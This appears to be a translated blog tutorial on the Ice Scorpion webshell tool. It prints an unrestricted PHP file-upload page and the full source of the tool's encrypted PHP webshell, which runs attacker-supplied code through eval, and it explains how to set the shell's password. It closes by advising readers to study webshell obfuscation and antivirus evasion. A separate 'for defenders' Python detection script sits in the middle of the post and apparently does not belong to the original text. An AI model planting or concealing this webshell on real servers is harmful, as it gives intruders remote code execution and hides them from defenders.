How to use Ice Scorpion 3.0 and how to change the default password

Preface

I downloaded the latest version, Ice Scorpion 3.0 beta2, today, but I still could not connect. Later I asked a senior colleague at my company to help find the reason. This is a record of that, and I hope it helps you.

This article is relatively basic and aimed mainly at novices. It has little technical depth and mostly covers the operating procedure.


First, look at which files are downloaded. The server folder contains webshells in various languages.


Environment configuration

Here I use the PHP webshell for the experiment. First I started a Windows virtual machine, downloaded phpstudy, started Apache, and then wrote PHP code for file upload. This is the PHP file upload code from the rookie tutorial. The code is as follows:


<!-- index.html code -->

<html>
<head>
<meta charset="utf-8">
<title>Upload</title>
</head>
<body>
<!-- The form below passes the received file to upload_file.php for processing -->
<form action="upload_file.php" method="post" enctype="multipart/form-data">
    <label for="file">文件名:</label>
    <input type="file" name="file" id="file"><br>
    <input type="submit" name="submit" value="提交">
</form>

</body>
</html>

<?php
// upload_file.php
if ($_FILES["file"]["error"] > 0)
{
    echo "错误:" . $_FILES["file"]["error"] . "<br>";
}
else
{
    echo "上传文件名: " . $_FILES["file"]["name"] . "<br>";
    echo "文件类型: " . $_FILES["file"]["type"] . "<br>";
    echo "文件大小: " . ($_FILES["file"]["size"] / 1024) . " kB<br>";
    echo "文件临时存储的位置: " . $_FILES["file"]["tmp_name"];
    // The file is uploaded to the upload folder under the current directory
    move_uploaded_file($_FILES["file"]["tmp_name"], "upload/" . $_FILES["file"]["name"]);
    echo "文件存储在: " . "upload/" . $_FILES["file"]["name"];
}
?>

Put the code above in the following folder:
[screenshot of the folder]
This folder exists as long as you have installed phpstudy; I installed it in the default directory. upload_file.php writes uploaded files to the upload folder under the current directory, so we need to create an upload folder ourselves.


Connect webshell

On the upload page, click Choose File to select the file, then click Submit to upload our PHP webshell. A result page appears when the upload is successful.

Next, double-click to open Ice Scorpion. If it cannot be opened, the Java version may be wrong. Here I give my own Java version as a reference.
[screenshot of the Java version]

After it opens, right-click in the blank area and click Add. Enter the URL and password and click Save.

Now for why the default password is rebeyond and how to change it. Let's look at the source code of Ice Scorpion's PHP shell:

<?php
@error_reporting(0);
session_start();

if ($_SERVER['REQUEST_METHOD'] === 'POST')
{
    $key="e45e329feb5d925b"; // This line is the first 16 characters of the MD5 of the password
    $_SESSION['k']=$key;
    $post=file_get_contents("php://input");
    if(!extension_loaded('openssl'))
    {
        $t="base64_"."decode";
        $post=$t($post."");

        for($i=0;$i<strlen($post);$i++) {
            $post[$i] = $post[$i]^$key[$i+1&15];
        }
    }
    else
    {
        $post=openssl_decrypt($post, "AES128", $key);
    }
    $arr=explode('|',$post);
    $func=$arr[0];
    $params=$arr[1];
    class C{
        public function __invoke($p) {
            eval($p."");
        }
    }
    @call_user_func(new C(),$params);
}
?>

As I marked in the code:

$key="e45e329feb5d925b"; // This is the first 16 characters of the MD5 of the password.

Go to the cmd5 website, which performs encryption and decryption operations, and enter rebeyond. The first 16 characters of the 32-character MD5 of rebeyond are exactly the value of key in the code (the first row of the result, md5(rebeyond,32)). Now everyone should know how to change the password: replace the key value in the code with the first 16 characters of the MD5 of the password you want to use, and you can then use your own password to log in to the shell. For example, if you want to use admin as the password, look up the MD5 of admin, then change the value in "$key="e45e329feb5d925b";" to 21232f297a57a5a7 to log in using admin as the password. That covers it in enough detail, so I will stop here.
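For defenders, the key derivation described above doubles as a triage check on a web root. The sketch below is an added example, not code from the original post or from the tool's author: it flags PHP files that combine a 16-hex-character key with the traits visible in the shell source, and reports whether the key corresponds to one of the two passwords discussed here. The function names, the trait list, the `min_traits` threshold and both sample strings are assumptions made for the illustration.

```python
import hashlib
import re

# Any PHP variable assigned a 16-hex-character string (the shell's $key).
KEY_RE = re.compile(r'\$\w+\s*=\s*["\']([0-9a-fA-F]{16})["\']')
# Traits taken from the shell source shown above.
TRAITS = {
    "reads raw request body": re.compile(r"php://input"),
    "decrypts body with openssl": re.compile(r"openssl_decrypt\s*\("),
    "stores key in session": re.compile(r"\$_SESSION\[\s*['\"]k['\"]\s*\]"),
    "evals decrypted data": re.compile(r"\beval\s*\("),
}
# The two passwords discussed in the post; extend from your own IR notes.
KNOWN_PASSWORDS = ("rebeyond", "admin")


def derive_key(password: str) -> str:
    """Key as described in the post: first 16 hex chars of MD5(password)."""
    return hashlib.md5(password.encode()).hexdigest()[:16]


def triage(php_source: str, min_traits: int = 3) -> dict:
    """Score one PHP file; min_traits is an assumed threshold."""
    m = KEY_RE.search(php_source)
    key = m.group(1).lower() if m else None
    hits = [name for name, rx in TRAITS.items() if rx.search(php_source)]
    password = next((p for p in KNOWN_PASSWORDS if derive_key(p) == key), None)
    return {
        "key": key,
        "known_password": password,
        "traits": hits,
        "suspicious": key is not None and len(hits) >= min_traits,
    }


# Constructed samples: indicator lines only, and an unrelated benign file.
SHELL_SAMPLE = '''<?php
$key="e45e329feb5d925b";
$_SESSION['k']=$key;
$post=file_get_contents("php://input");
$post=openssl_decrypt($post, "AES128", $key);
eval($p."");
'''
BENIGN_SAMPLE = '<?php $token="0123456789abcdef"; echo "ok";'

if __name__ == "__main__":
    for label, src in (("shell", SHELL_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(label, triage(src))
```

A shell whose constructs were renamed or obfuscated will not match these patterns, so treat a miss as inconclusive rather than clean.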

Ice scorpion page

After the connection is successful, the Ice Scorpion page is displayed.
You can use it according to your needs, but I suggest you study webshell obfuscation and antivirus evasion when you have the opportunity, otherwise the shell is easily detected and removed.

Origin blog.csdn.net/qq_41874930/article/details/107916317